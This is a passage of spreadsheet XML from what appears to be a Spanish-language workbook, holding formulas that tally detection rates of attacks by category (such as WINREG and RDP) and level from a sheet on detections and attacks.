      <c r="CK20" s="292"/>
      <c r="CL20" s="292"/>
      <c r="CM20" s="292"/>
      <c r="CN20" s="292"/>
      <c r="CO20" s="292"/>
      <c r="CP20" s="292"/>
      <c r="CQ20" s="292"/>
      <c r="CR20" s="292"/>
      <c r="CS20" s="292"/>
      <c r="CT20" s="292"/>
      <c r="CU20" s="292"/>
      <c r="CV20" s="292"/>
      <c r="CW20" s="292"/>
      <c r="CX20" s="292"/>
      <c r="CY20" s="293"/>
      <c r="CZ20" s="574"/>
      <c r="DA20" s="574"/>
      <c r="DB20" s="574"/>
      <c r="DC20" s="638" t="s">
        <v>310</v>
      </c>
      <c r="DD20" s="639">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GV$3:$GV$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DC20,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>107</v>
      </c>
      <c r="DE20" s="618">
        <v>107.0</v>
      </c>
      <c r="DF20" s="336">
        <f t="shared" si="20"/>
        <v>1</v>
      </c>
      <c r="DG20" s="173">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="DH20" s="337">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI20" s="607">
        <f t="shared" si="4"/>
        <v>107</v>
      </c>
      <c r="DJ20" s="608">
        <f t="shared" si="22"/>
        <v>1</v>
      </c>
      <c r="DK20" s="609">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="DL20" s="455">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DM20" s="610"/>
      <c r="DN20" s="610"/>
      <c r="DO20" s="619" t="s">
        <v>310</v>
      </c>
      <c r="DP20" s="620">
        <f>DD20/'(D) - Análisis Resultados I - S'!EB39</f>
        <v>21.4</v>
      </c>
      <c r="DQ20" s="574"/>
      <c r="DR20" s="619" t="s">
        <v>310</v>
      </c>
      <c r="DS20" s="620">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="DT20" s="574"/>
      <c r="DU20" s="574"/>
      <c r="DV20" s="574"/>
      <c r="DW20" s="656" t="s">
        <v>2452</v>
      </c>
      <c r="DX20" s="657" t="s">
        <v>2477</v>
      </c>
      <c r="DY20" s="658">
        <f>EX11</f>
        <v>0.5759995794</v>
      </c>
      <c r="DZ20" s="659">
        <f>EX12</f>
        <v>0.7045454545</v>
      </c>
      <c r="EC20" s="655" t="s">
        <v>1373</v>
      </c>
      <c r="ED20" s="637">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC20,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC20  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC20,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC20  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.3684210526</v>
      </c>
      <c r="EE20" s="336">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC20,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC20  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC20,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC20  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0</v>
      </c>
      <c r="EF20" s="561" t="s">
        <v>12</v>
      </c>
      <c r="EG20" s="629" t="s">
        <v>12</v>
      </c>
      <c r="EH20" s="574"/>
      <c r="EI20" s="574"/>
      <c r="EJ20" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ12&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ12*'(B) - Detecciones - Ataques'!HN12/('(B) - Detecciones - Ataques'!HN12+'(B) - Detecciones - Ataques'!HO12),0)</f>
        <v>0</v>
      </c>
      <c r="EK20" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ12&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ12*'(B) - Detecciones - Ataques'!HO12/('(B) - Detecciones - Ataques'!HN12+'(B) - Detecciones - Ataques'!HO12),0)</f>
        <v>0</v>
      </c>
      <c r="EL20" s="574"/>
      <c r="EM20" s="571"/>
      <c r="EN20" s="574"/>
      <c r="EO20" s="379" t="s">
        <v>664</v>
      </c>
      <c r="EP20" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EO20)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO20 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="EQ20" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,EO20)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO20 &amp; "*")</f>
        <v>8</v>
      </c>
      <c r="ER20" s="623">
        <f t="shared" si="13"/>
        <v>0.625</v>
      </c>
      <c r="ES20" s="401"/>
      <c r="ET20" s="402"/>
      <c r="EV20" s="574"/>
      <c r="EW20" s="330" t="s">
        <v>2448</v>
      </c>
      <c r="EX20" s="12" t="s">
        <v>2455</v>
      </c>
      <c r="EY20" s="451" t="s">
        <v>2456</v>
      </c>
      <c r="EZ20" s="20"/>
      <c r="FA20" s="574"/>
      <c r="FB20" s="574"/>
      <c r="FC20" s="574"/>
      <c r="FD20" s="574"/>
      <c r="FE20" s="574"/>
      <c r="FF20" s="574"/>
      <c r="FG20" s="574"/>
      <c r="FH20" s="574"/>
      <c r="FI20" s="574"/>
      <c r="FJ20" s="574"/>
      <c r="FK20" s="574"/>
      <c r="FN20" s="642" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"WINREG")</f>
        <v>WINREG</v>
      </c>
      <c r="FO20" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN20)</f>
        <v>0</v>
      </c>
      <c r="FP20" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN20)</f>
        <v>0</v>
      </c>
      <c r="FQ20" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN20)</f>
        <v>0</v>
      </c>
      <c r="FR20" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN20)</f>
        <v>1</v>
      </c>
      <c r="FS20" s="574"/>
      <c r="FT20" s="574"/>
      <c r="FU20" s="574"/>
      <c r="FV20" s="574"/>
      <c r="FW20" s="574"/>
      <c r="FX20" s="574"/>
    </row>
    <row r="21">
      <c r="D21" s="660">
        <f>D16/E9</f>
        <v>0.008009672057</v>
      </c>
      <c r="E21" s="648">
        <f>E16/E12</f>
        <v>0.01603561549</v>
      </c>
      <c r="G21" s="315" t="s">
        <v>2447</v>
      </c>
      <c r="H21" s="316" t="s">
        <v>2093</v>
      </c>
      <c r="I21" s="316" t="s">
        <v>2013</v>
      </c>
      <c r="J21" s="316" t="s">
        <v>951</v>
      </c>
      <c r="K21" s="316" t="s">
        <v>633</v>
      </c>
      <c r="L21" s="316" t="s">
        <v>1725</v>
      </c>
      <c r="M21" s="316" t="s">
        <v>244</v>
      </c>
      <c r="N21" s="316" t="s">
        <v>427</v>
      </c>
      <c r="O21" s="316" t="s">
        <v>1373</v>
      </c>
      <c r="P21" s="316" t="s">
        <v>209</v>
      </c>
      <c r="Q21" s="316" t="s">
        <v>664</v>
      </c>
      <c r="R21" s="316" t="s">
        <v>357</v>
      </c>
      <c r="S21" s="316" t="s">
        <v>310</v>
      </c>
      <c r="T21" s="316" t="s">
        <v>292</v>
      </c>
      <c r="U21" s="317" t="s">
        <v>558</v>
      </c>
      <c r="W21" s="291" t="s">
        <v>2447</v>
      </c>
      <c r="X21" s="498" t="s">
        <v>2108</v>
      </c>
      <c r="Y21" s="513" t="s">
        <v>2177</v>
      </c>
      <c r="Z21" s="498" t="s">
        <v>2193</v>
      </c>
      <c r="AA21" s="498" t="s">
        <v>2095</v>
      </c>
      <c r="AB21" s="498" t="s">
        <v>2074</v>
      </c>
      <c r="AC21" s="498" t="s">
        <v>2061</v>
      </c>
      <c r="AD21" s="498" t="s">
        <v>2015</v>
      </c>
      <c r="AE21" s="498" t="s">
        <v>953</v>
      </c>
      <c r="AF21" s="498" t="s">
        <v>1040</v>
      </c>
      <c r="AG21" s="498" t="s">
        <v>1012</v>
      </c>
      <c r="AH21" s="498" t="s">
        <v>1164</v>
      </c>
      <c r="AI21" s="498" t="s">
        <v>1848</v>
      </c>
      <c r="AJ21" s="498" t="s">
        <v>2300</v>
      </c>
      <c r="AK21" s="498" t="s">
        <v>1138</v>
      </c>
      <c r="AL21" s="498" t="s">
        <v>974</v>
      </c>
      <c r="AM21" s="498" t="s">
        <v>1108</v>
      </c>
      <c r="AN21" s="498" t="s">
        <v>1702</v>
      </c>
      <c r="AO21" s="498" t="s">
        <v>1626</v>
      </c>
      <c r="AP21" s="514" t="s">
        <v>636</v>
      </c>
      <c r="AQ21" s="498" t="s">
        <v>1726</v>
      </c>
      <c r="AR21" s="498" t="s">
        <v>822</v>
      </c>
      <c r="AS21" s="498" t="s">
        <v>445</v>
      </c>
      <c r="AT21" s="498" t="s">
        <v>1747</v>
      </c>
      <c r="AU21" s="498" t="s">
        <v>989</v>
      </c>
      <c r="AV21" s="498" t="s">
        <v>246</v>
      </c>
      <c r="AW21" s="498" t="s">
        <v>2242</v>
      </c>
      <c r="AX21" s="498" t="s">
        <v>1282</v>
      </c>
      <c r="AY21" s="498" t="s">
        <v>429</v>
      </c>
      <c r="AZ21" s="498" t="s">
        <v>912</v>
      </c>
      <c r="BA21" s="498" t="s">
        <v>1837</v>
      </c>
      <c r="BB21" s="498" t="s">
        <v>1510</v>
      </c>
      <c r="BC21" s="498" t="s">
        <v>1411</v>
      </c>
      <c r="BD21" s="498" t="s">
        <v>1397</v>
      </c>
      <c r="BE21" s="498" t="s">
        <v>1374</v>
      </c>
      <c r="BF21" s="498" t="s">
        <v>677</v>
      </c>
      <c r="BG21" s="498" t="s">
        <v>790</v>
      </c>
      <c r="BH21" s="498" t="s">
        <v>262</v>
      </c>
      <c r="BI21" s="498" t="s">
        <v>771</v>
      </c>
      <c r="BJ21" s="498" t="s">
        <v>724</v>
      </c>
      <c r="BK21" s="498" t="s">
        <v>211</v>
      </c>
      <c r="BL21" s="498" t="s">
        <v>805</v>
      </c>
      <c r="BM21" s="498" t="s">
        <v>932</v>
      </c>
      <c r="BN21" s="498" t="s">
        <v>1306</v>
      </c>
      <c r="BO21" s="498" t="s">
        <v>1903</v>
      </c>
      <c r="BP21" s="498" t="s">
        <v>2335</v>
      </c>
      <c r="BQ21" s="498" t="s">
        <v>1983</v>
      </c>
      <c r="BR21" s="498" t="s">
        <v>1999</v>
      </c>
      <c r="BS21" s="498" t="s">
        <v>1971</v>
      </c>
      <c r="BT21" s="498" t="s">
        <v>1201</v>
      </c>
      <c r="BU21" s="498" t="s">
        <v>750</v>
      </c>
      <c r="BV21" s="498" t="s">
        <v>666</v>
      </c>
      <c r="BW21" s="498" t="s">
        <v>892</v>
      </c>
      <c r="BX21" s="498" t="s">
        <v>1214</v>
      </c>
      <c r="BY21" s="498" t="s">
        <v>1293</v>
      </c>
      <c r="BZ21" s="498" t="s">
        <v>1331</v>
      </c>
      <c r="CA21" s="498" t="s">
        <v>2215</v>
      </c>
      <c r="CB21" s="498" t="s">
        <v>2261</v>
      </c>
      <c r="CC21" s="498" t="s">
        <v>359</v>
      </c>
      <c r="CD21" s="498" t="s">
        <v>1230</v>
      </c>
      <c r="CE21" s="498" t="s">
        <v>1812</v>
      </c>
      <c r="CF21" s="498" t="s">
        <v>1958</v>
      </c>
      <c r="CG21" s="498" t="s">
        <v>1667</v>
      </c>
      <c r="CH21" s="498" t="s">
        <v>505</v>
      </c>
      <c r="CI21" s="498" t="s">
        <v>312</v>
      </c>
      <c r="CJ21" s="498" t="s">
        <v>2289</v>
      </c>
      <c r="CK21" s="498" t="s">
        <v>411</v>
      </c>
      <c r="CL21" s="498" t="s">
        <v>1361</v>
      </c>
      <c r="CM21" s="498" t="s">
        <v>701</v>
      </c>
      <c r="CN21" s="498" t="s">
        <v>586</v>
      </c>
      <c r="CO21" s="498" t="s">
        <v>294</v>
      </c>
      <c r="CP21" s="498" t="s">
        <v>339</v>
      </c>
      <c r="CQ21" s="498" t="s">
        <v>370</v>
      </c>
      <c r="CR21" s="498" t="s">
        <v>394</v>
      </c>
      <c r="CS21" s="498" t="s">
        <v>1687</v>
      </c>
      <c r="CT21" s="498" t="s">
        <v>486</v>
      </c>
      <c r="CU21" s="498" t="s">
        <v>1889</v>
      </c>
      <c r="CV21" s="498" t="s">
        <v>1187</v>
      </c>
      <c r="CW21" s="498" t="s">
        <v>560</v>
      </c>
      <c r="CX21" s="498" t="s">
        <v>1175</v>
      </c>
      <c r="CY21" s="499" t="s">
        <v>1926</v>
      </c>
      <c r="CZ21" s="403"/>
      <c r="DA21" s="403"/>
      <c r="DB21" s="403"/>
      <c r="DC21" s="638" t="s">
        <v>292</v>
      </c>
      <c r="DD21" s="639">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GV$3:$GV$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DC21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>0</v>
      </c>
      <c r="DE21" s="618">
        <v>0.0</v>
      </c>
      <c r="DF21" s="561" t="s">
        <v>12</v>
      </c>
      <c r="DG21" s="173">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="DH21" s="629" t="s">
        <v>12</v>
      </c>
      <c r="DI21" s="607">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="DJ21" s="608" t="s">
        <v>12</v>
      </c>
      <c r="DK21" s="609">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="DL21" s="455" t="s">
        <v>12</v>
      </c>
      <c r="DM21" s="610"/>
      <c r="DN21" s="610"/>
      <c r="DO21" s="619" t="s">
        <v>292</v>
      </c>
      <c r="DP21" s="620">
        <f>DD21/'(D) - Análisis Resultados I - S'!EB40</f>
        <v>0</v>
      </c>
      <c r="DQ21" s="403"/>
      <c r="DR21" s="619" t="s">
        <v>292</v>
      </c>
      <c r="DS21" s="620" t="s">
        <v>12</v>
      </c>
      <c r="DT21" s="403"/>
      <c r="DU21" s="403"/>
      <c r="DV21" s="403"/>
      <c r="DW21" s="661" t="s">
        <v>2462</v>
      </c>
      <c r="DX21" s="662" t="s">
        <v>2478</v>
      </c>
      <c r="DY21" s="663">
        <v>0.0</v>
      </c>
      <c r="DZ21" s="664">
        <v>0.0</v>
      </c>
      <c r="EC21" s="665" t="s">
        <v>209</v>
      </c>
      <c r="ED21" s="637">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.5</v>
      </c>
      <c r="EE21" s="336">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0</v>
      </c>
      <c r="EF21" s="336">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0</v>
      </c>
      <c r="EG21" s="337">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC21,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC21  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.7142857143</v>
      </c>
      <c r="EH21" s="403"/>
      <c r="EI21" s="403"/>
      <c r="EJ21" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ13&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ13*'(B) - Detecciones - Ataques'!HN13/('(B) - Detecciones - Ataques'!HN13+'(B) - Detecciones - Ataques'!HO13),0)</f>
        <v>0</v>
      </c>
      <c r="EK21" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ13&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ13*'(B) - Detecciones - Ataques'!HO13/('(B) - Detecciones - Ataques'!HN13+'(B) - Detecciones - Ataques'!HO13),0)</f>
        <v>0</v>
      </c>
      <c r="EL21" s="403"/>
      <c r="EM21" s="597"/>
      <c r="EN21" s="403"/>
      <c r="EO21" s="379" t="s">
        <v>357</v>
      </c>
      <c r="EP21" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EO21)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO21 &amp; "*")</f>
        <v>3</v>
      </c>
      <c r="EQ21" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,EO21)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO21 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="ER21" s="623">
        <f t="shared" si="13"/>
        <v>0.6</v>
      </c>
      <c r="ES21" s="401"/>
      <c r="ET21" s="402"/>
      <c r="EV21" s="403"/>
      <c r="EW21" s="379" t="s">
        <v>2093</v>
      </c>
      <c r="EX21" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW21)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW21 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW21)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW21 &amp; "*"))</f>
        <v>0.1854618168</v>
      </c>
      <c r="EY21" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW21)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW21 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW21)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW21 &amp; "*"))</f>
        <v>0.6666666667</v>
      </c>
      <c r="EZ21" s="621"/>
      <c r="FA21" s="403"/>
      <c r="FB21" s="403"/>
      <c r="FC21" s="403"/>
      <c r="FD21" s="403"/>
      <c r="FE21" s="403" t="s">
        <v>2679</v>
      </c>
      <c r="FF21" s="12" t="s">
        <v>2455</v>
      </c>
      <c r="FG21" s="451" t="s">
        <v>2456</v>
      </c>
      <c r="FH21" s="403"/>
      <c r="FI21" s="403"/>
      <c r="FJ21" s="403"/>
      <c r="FK21" s="403"/>
      <c r="FN21" s="403" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"RDP")</f>
        <v>RDP</v>
      </c>
      <c r="FO21" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN21)</f>
        <v>0.5</v>
      </c>
      <c r="FP21" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN21)</f>
        <v>0.5</v>
      </c>
      <c r="FQ21" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN21)</f>
        <v>0.5</v>
      </c>
      <c r="FR21" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN21)</f>
        <v>2</v>
      </c>
      <c r="FS21" s="403"/>
      <c r="FT21" s="403"/>
      <c r="FU21" s="403"/>
      <c r="FV21" s="403"/>
      <c r="FW21" s="403"/>
      <c r="FX21" s="403"/>
    </row>
    <row r="22">
      <c r="D22" s="173"/>
      <c r="E22" s="173"/>
      <c r="G22" s="644" t="s">
        <v>2671</v>
      </c>
      <c r="H22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, H$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; H$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, H$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; H$21 &amp; "*"
    )
)
</f>
        <v>0.1854618168</v>
      </c>
      <c r="I22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, I$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; I$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, I$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; I$21 &amp; "*"
    )
)
</f>
        <v>0.05366134369</v>
      </c>
      <c r="J22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, J$21
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; J$21 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, J$21
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; J$21 &amp; "*"
    )
)
</f>
        <v>0.9</v>
      </c>
      <c r="K22" s="645">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, K$21
    ) +
    SUMIFS(
